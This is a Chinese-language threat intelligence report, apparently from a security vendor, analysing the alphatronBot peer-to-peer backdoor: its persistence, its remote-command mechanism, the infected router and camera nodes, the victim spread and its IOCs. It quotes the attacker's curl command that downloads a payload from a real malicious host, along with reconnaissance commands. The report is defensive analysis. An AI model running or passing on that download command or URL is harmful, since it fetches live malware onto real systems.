概述
我们建议政企客户在办公区和服务器区同时部署天擎EDR,最新版本的病毒库已经支持对新老版本 alphatronBot 的查杀。
alphatronBot
Cmd命令 |
curl -k -o
"***AppData\Local\Temp\NetFramework.4.8.7z" -L -C -
"https://z.yaridata.com/v/NetFramework.4.8.7z" --user-agent "****"
--retry 3 |
Wtime.cmd 被添加为持久化,负责启动加载器 wuf.exe。
Wuf.exe 的逻辑如下,启动名为 Windows Driver Foundation (WDF).exe 的 alphatronBot 后门程序。
2024 年重构后的 alphatronBot 由开源项目 manishmeganathan/peerchat 修改而来,通过 libp2p 实现的聊天室程序。
攻击者在此基础上进行了修改:
启动时会检测自身是否在 C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\ 目录下,并且该目录下是否存在 r01.txt
将自己注册为 P2P 的节点,并将节点配置信息储存在同目录下的 zk.txt 和 zi.txt 中。
攻击者内置了 700 多个 P2P 节点。格式如下:
/ip4/受感染的p2p节点/tcp/48888/p2p/Peer
ID
该项目节点间的通信由 PubSub 方式实现,所有节点连接到一个共同的 Topic(roomname),由该 Topic 的发送者来实现消息分发,项目中内置的默认 Topic 如下:
攻击者修改了 Topic 前缀为 at001,并替换了 roomname。
连接到 Topic 后将 username 设置为 Alpha。
最后修改了该项目的 UI 逻辑,将接收到消息后的打印函数 display.chatmessage 改为执行 CMD 命令从而实现远控功能
修改后的 display.chatmessage 会将接收到的消息写入 temp 文件夹下的 zc01.cmd。
最后通过 cmd 执行 zc01.cmd。
溯源分析
后门连接到 P2P 分布式网络后会接收如下命令进行探测和检查。
Cmd命令 |
tasklist |
WMIC
DISKDRIVE GET SERIALNUMBER |
攻击者可以在下发的 cmd 中对本地储存的 Peer ID 进行判断从而实现对不同目标下发定制化的 payload。
影响情况
受感染的P2P网络
后门内置的 700 余个 p2p 网络由 80 个国家和地区受感染的网络设备组件组成:
节点涉及 MikroTik 路由器、Hikvision 摄像头、VPS 服务器、DLink 路由器、CPE 设备等,由于 alphatronBot 会将自身终端注册成 P2P 节点,所以该 P2P 网络的规模要远比目前观察的规模大,基于奇安信全球僵尸网络检测系统观测到部分 P2P 节点对应的 IP开始被当作代理对 Fortinet SSVPN 进行爆破活动。
国内影响范围
我们统计了国内的影响情况,从 2023 年中出现一直持续至今。
受害者单位所属行业占比如下:
由于 P2P 协议的隐蔽性,攻击者可以通过任意节点下发指令,无需通过单一 C&C 服务器。这意味着即便部分节点被安全团队清理,其他节点仍可保持木马的运行。攻击者可以借助分布式更新功能,随时注入新的模块或修复漏洞,进一步增强木马的生存能力。我们建议政企客户及时更新病毒库,并全盘扫描,流量层面查询我们提供的 P2P C2 节点以保证系统的安全。
总结
IOC
https://github.com/RedDrip7/APT_Digital_Weapon/blob/master/alphatronBot/alphatronBot_ioc.md
ITW URL:
https://z.yaridata.com/v/NetFramework.4.8.7z
MD5:
e1e9a32926ebdbcedaf693dbc43b0e4d(2024年alphatronBot)
57cc9374d78d5e9841fddfd3cc7bd609(2024年alphatronBot)
点击阅读原文至ALPHA 7.0
即刻助力威胁研判